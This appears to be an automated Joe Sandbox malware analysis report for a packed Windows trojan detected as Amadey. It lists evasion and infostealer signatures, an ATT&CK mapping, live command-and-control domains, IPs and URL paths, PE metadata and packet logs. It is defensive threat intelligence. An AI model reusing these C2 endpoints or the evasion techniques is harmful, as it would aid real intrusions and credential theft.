Source: C:\Users\user\Desktop\Yda6AxtlVP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00F39980 rdtsc 0_2_00F39980
Source: Yda6AxtlVP.exe, 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: rProgram Manager
Source: Yda6AxtlVP.exeBinary or memory string: P7rProgram Manager
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49716 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Yda6AxtlVP.exe66%ReversingLabsWin32.Trojan.Amadey
Yda6AxtlVP.exe65%VirustotalBrowse
Yda6AxtlVP.exe100%AviraTR/Crypt.TPM.Gen
Yda6AxtlVP.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5sb.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlYda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
          		high
          http://html4/loose.dtdYda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#Yda6AxtlVP.exefalse
              		high
              https://httpbin.org/ipbeforeYda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://home.fivetk5sb.top/niCGME_Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://curl.se/docs/alt-svc.htmlYda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlYda6AxtlVP.exe, Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://.cssYda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://.jpgYda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://curl.se/docs/hsts.html#Yda6AxtlVP.exefalse
                            		high
                            http://home.fivetk5sb.top/niCGMYda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.121.15.192
                              		home.fivetk5sb.topSpain
                              		207046REDSERVICIOESfalse
                              34.226.108.155
                              		httpbin.orgUnited States
                              		14618AMAZON-AESUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1579641
                              Start date and time:2024-12-23 06:53:58 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 54s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Yda6AxtlVP.exe
                              renamed because original name is a hash value
                              Original Sample Name:339948cf14bfed6a4e1cd717beeb9fff.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              00:55:00API Interceptor3x Sleep call for process: Yda6AxtlVP.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.121.15.1922OJYjm4J1B.exeGet hashmaliciousUnknownBrowse
                              • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                              ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                              5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                              bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • fivetk5sb.top/v1/upload.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • twentytk20ht.top/v1/upload.php
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                              • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                              • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                              • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                              • fivetk5ht.top/v1/upload.php
                              34.226.108.1552OJYjm4J1B.exeGet hashmaliciousUnknownBrowse
                                ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                            file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  httpbin.org2OJYjm4J1B.exeGet hashmaliciousUnknownBrowse
                                                  • 34.226.108.155
                                                  ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 34.226.108.155
                                                  5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 98.85.100.80
                                                  bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 98.85.100.80
                                                  jDSFvyBr1P.exeGet hashmaliciousUnknownBrowse
                                                  • 98.85.100.80
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 98.85.100.80
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 34.226.108.155
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                  • 34.226.108.155
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                  • 98.85.100.80
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                  • 34.226.108.155
                                                  home.fivetk5sb.topze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 185.121.15.192
                                                  bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 185.121.15.192

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  REDSERVICIOES2OJYjm4J1B.exeGet hashmaliciousUnknownBrowse
                                                  • 185.121.15.192
                                                  ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 185.121.15.192
                                                  5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 185.121.15.192
                                                  bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                  • 185.121.15.192
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                  • 185.121.15.192
                                                  AMAZON-AESUS2OJYjm4J1B.exeGet hashmaliciousUnknownBrowse
                                                  • 34.226.108.155
                                                  ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  • 34.226.108.155
                                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                                  • 54.88.200.107
                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 54.137.103.116
                                                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 54.136.31.230
                                                  arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 54.2.45.144
                                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 3.243.200.233
                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 3.242.220.133
                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 34.201.15.152
                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 44.205.162.242

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  No created / dropped files found

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Entropy (8bit):7.984874267657509
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • VXD Driver (31/22) 0.00%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:Yda6AxtlVP.exe
                                                  File size:4'534'272 bytes
                                                  MD5:339948cf14bfed6a4e1cd717beeb9fff
                                                  SHA1:5579437dde79a533dd625fb7fb1ccdb6226e3364
                                                  SHA256:6eb9cd9fe518bd6649b3db9de8478d7e8570fa22272b111a76c491749e049994
                                                  SHA512:483ee1fcd7ac2262e90feb4bf38a7a11a4f76a77d577cda49fb0e6ddf30db36f33819af2dced92d7af156fc25132878cd2b69fe4e210698562990e80ff1f4733
                                                  SSDEEP:49152:I2c+UqRHoBg+InSsYjp0UE2fHvc/IMqDwU8PU+WKOUSjJSU1lSINnjnwcLH3bsAn:Dc+Uq2/IVyqUigjDLbSIxwPD6Ew
                                                  TLSH:082633D20A1A08B3D89B3933C3AA8D972D3DCFB545DD094DF630879A1D1AD9B3275C98
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fg...............(..N...t..2...@........N...@..........................p......HKE...@... ............................

                                                  File Icon

                                                  Icon Hash:90cececece8e8eb0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x1094000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                  DLL Characteristics:DYNAMIC_BASE
                                                  Time Stamp:0x6766E7C6 [Sat Dec 21 16:07:34 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp 00007F9664C04EFAh
                                                  femms
                                                  inc ebp
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [edx], al
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], dl
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [ebx], al
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [ecx], al
                                                  add byte ptr [eax], 00000000h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  adc byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  pop es
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+0Ah], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add dword ptr [ecx], eax
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  or byte ptr [eax+00000000h], al
                                                  add byte ptr [eax], al
                                                  adc byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add cl, byte ptr [edx]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  xor byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+00000000h], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  pop es
                                                  add byte ptr [eax], 00000000h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  adc byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add cl, byte ptr [edx]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  xor byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  or byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  and al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add dword ptr [eax+00000000h], eax
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x72105f0x73.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7200000x1ac.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc920c00x10agnlrrtx
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc920700x18agnlrrtx
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  0x10000x71f0000x28a000edae8da53040987180e18b2665f67580unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x7200000x1ac0x20075fec20a890f179a2a2afb74f2e98b3eFalse0.58203125data4.572767597409539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata 0x7210000x10000x2008558f0ecc290038fcf98ab326e486ce3False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  0x7220000x3ab0000x2009bc95db48c95136edf1757efbdcbe327unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  agnlrrtx0xacd0000x1c60000x1c54008480853959d26976f949b683d779d03bFalse0.9945160602247656data7.955768774106295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  dgeihioi0xc930000x10000x4006ed2bdedd68d5ccc406c52a24bae06aaFalse0.7626953125data6.118670505375551IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .taggant0xc940000x30000x22001f100cbd8b214b10dc58909054244ec0False0.06146599264705882DOS executable (COM)0.6945346853219869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_MANIFEST0xc920d00x152ASCII text, with CRLF line terminators0.6479289940828402

                                                  Imports

                                                  DLLImport
                                                  kernel32.dlllstrcpy

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 23, 2024 06:54:55.143579006 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:55.143624067 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:55.143768072 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:55.155056000 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:55.155073881 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:56.889960051 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:56.909831047 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:56.909859896 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:56.911360025 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:56.911453962 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:56.923000097 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:56.923134089 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:56.927022934 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:56.927032948 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:56.971420050 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:57.246761084 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:57.246896029 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:57.247014046 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:57.256012917 CET49705443192.168.2.1034.226.108.155
                                                  Dec 23, 2024 06:54:57.256030083 CET4434970534.226.108.155192.168.2.10
                                                  Dec 23, 2024 06:54:59.143013954 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.262480974 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.262582064 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.263566971 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383121967 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383167028 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383244038 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383268118 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383292913 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383343935 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383354902 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383415937 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383514881 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383534908 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383554935 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383567095 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383574963 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383580923 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383605957 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383614063 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383634090 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383688927 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.383701086 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.383763075 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.502815962 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.502860069 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.502891064 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.502962112 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.503010988 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.503026009 CET8049716185.121.15.192192.168.2.10
